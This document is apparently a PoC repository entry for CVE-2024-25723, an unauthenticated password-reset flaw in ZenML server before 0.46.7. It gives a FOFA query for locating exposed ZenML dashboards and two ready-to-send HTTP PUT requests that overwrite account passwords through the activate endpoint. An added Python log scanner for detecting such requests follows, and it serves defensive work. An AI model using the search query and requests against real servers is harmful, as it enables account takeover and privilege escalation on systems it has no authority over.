POC/wpoc/ZenML/ZenML服务器远程权限提升漏洞(CVE-2024-25723).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

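## ZenML Server Remote Privilege Escalation Vulnerability (CVE-2024-25723)
The ZenML server remote privilege escalation vulnerability (CVE-2024-25723) exists in the ZenML server of the ZenML machine learning package for Python in versions before 0.46.7. The `/*/{user_name_or_id}/activate` REST API endpoint grants access based only on a valid username and a new password supplied in the request body. This allows an unauthenticated user to escalate privileges remotely by directly resetting the password of any ZenML account.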
## fofa
```
title=="ZenML - Dashboard"
```
## poc
```
PUT /api/v1/users/*/activate HTTP/1.1
Host:
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 31

{"password": "Ldwk@20240426"}

PUT /api/v1/users/default/activate HTTP/1.1
Host:
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 31

{"password": "Ldwk@20240426"}
```
![image](https://github.com/wy876/POC/assets/139549762/698ab566-b17e-48c0-954d-1dd21f795405)
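
For defenders, requests like the ones above are visible in access logs. The following is an added example, not part of the original PoC or of ZenML's code: it scans log text for `PUT` requests to the activation endpoint and lists the accounts whose request was accepted. The combined log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines. Assumption: a reverse proxy in front of the
# ZenML server writes combined-format access logs.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Apr/2024:10:01:02 +0000] "PUT /api/v1/users/default/activate HTTP/1.1" 200 512 "-" "python-requests/2.28.1"
203.0.113.7 - - [26/Apr/2024:10:01:03 +0000] "PUT /api/v1/users/admin/activate HTTP/1.1" 404 87 "-" "python-requests/2.28.1"
198.51.100.20 - - [26/Apr/2024:10:02:00 +0000] "GET /api/v1/users/default HTTP/1.1" 200 301 "-" "Mozilla/5.0"
198.51.100.20 - - [26/Apr/2024:10:03:00 +0000] "PUT /api/v1/users/alice HTTP/1.1" 200 120 "-" "Mozilla/5.0"
192.0.2.44 - - [26/Apr/2024:10:04:00 +0000] "PUT /api/v1/users/%2A/activate?x=1 HTTP/1.1" 422 95 "-" "curl/8.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# The endpoint shown in the requests above: /api/v1/users/<name>/activate
ACTIVATE_RE = re.compile(r'^/api/v1/users/(?P<user>[^/]+)/activate/?$')


def find_activate_calls(log_text):
    """Return one record per PUT to the user activation endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "PUT":
            continue
        # Drop the query string and percent-decode before matching the path.
        path = unquote(m["target"].split("?", 1)[0])
        a = ACTIVATE_RE.match(path)
        if a:
            hits.append({"ip": m["ip"], "time": m["ts"], "user": a["user"],
                         "status": int(m["status"])})
    return hits


def accounts_to_review(hits):
    """Map source IP -> accounts whose activation request got a 2xx reply.

    A 2xx means the server accepted the request, so treat the password of
    each listed account as changed by the caller and reset it.
    """
    by_ip = defaultdict(set)
    for h in hits:
        if 200 <= h["status"] < 300:
            by_ip[h["ip"]].add(h["user"])
    return {ip: sorted(users) for ip, users in by_ip.items()}


if __name__ == "__main__":
    print(accounts_to_review(find_activate_calls(SAMPLE_LOG)))
```

On a server running a version before 0.46.7, any hit from a source that is not part of normal user onboarding is worth investigating, including the non-2xx ones, since they show which account names were tried.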